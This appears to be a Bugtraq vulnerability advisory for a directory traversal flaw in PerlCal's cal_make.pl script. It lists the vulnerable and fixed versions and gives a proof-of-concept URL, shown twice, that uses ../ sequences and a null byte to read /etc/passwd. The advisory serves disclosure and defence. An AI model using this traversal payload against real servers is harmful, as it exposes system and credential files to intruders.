PerlCal Directory Traversal Vulnerability
BID:2663
Info
PerlCal Directory Traversal Vulnerability
| Bugtraq ID: | 2663 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 27 2001 12:00AM |
| Updated: | Apr 27 2001 12:00AM |
| Credit: | Reported to bugtraq by Stan a.k.a. ThePike <[email protected]> on April 27, 2001. |
| Vulnerable: |
Acme Software PerlCal 2.95 Acme Software PerlCal 2.80 Acme Software PerlCal 2.18 Acme Software PerlCal 2.13 Acme Software PerlCal 2.9 e Acme Software PerlCal 2.9 d Acme Software PerlCal 2.9 c Acme Software PerlCal 2.9 b Acme Software PerlCal 2.9 a Acme Software PerlCal 2.9 Acme Software PerlCal 2.7 Acme Software PerlCal 2.6 Acme Software PerlCal 2.5 Acme Software PerlCal 2.4 Acme Software PerlCal 2.3 |
| Not Vulnerable: |
Acme Software PerlCal 2.99 Acme Software PerlCal 2.98 Acme Software PerlCal 2.97 Acme Software PerlCal 2.96 |
Exploit / POC
PerlCal Directory Traversal Vulnerability
http://www.example.com/cgi-bin/cal_make.pl?
p0=../../../../../../../../../../../../etc/passwd%00
This will display the /etc/passwd (if the webserver user has
access to this file).
(courtesy Stan a.k.a. ThePike <[email protected]>)
http://www.example.com/cgi-bin/cal_make.pl?
p0=../../../../../../../../../../../../etc/passwd%00
This will display the /etc/passwd (if the webserver user has
access to this file).
(courtesy Stan a.k.a. ThePike <[email protected]>)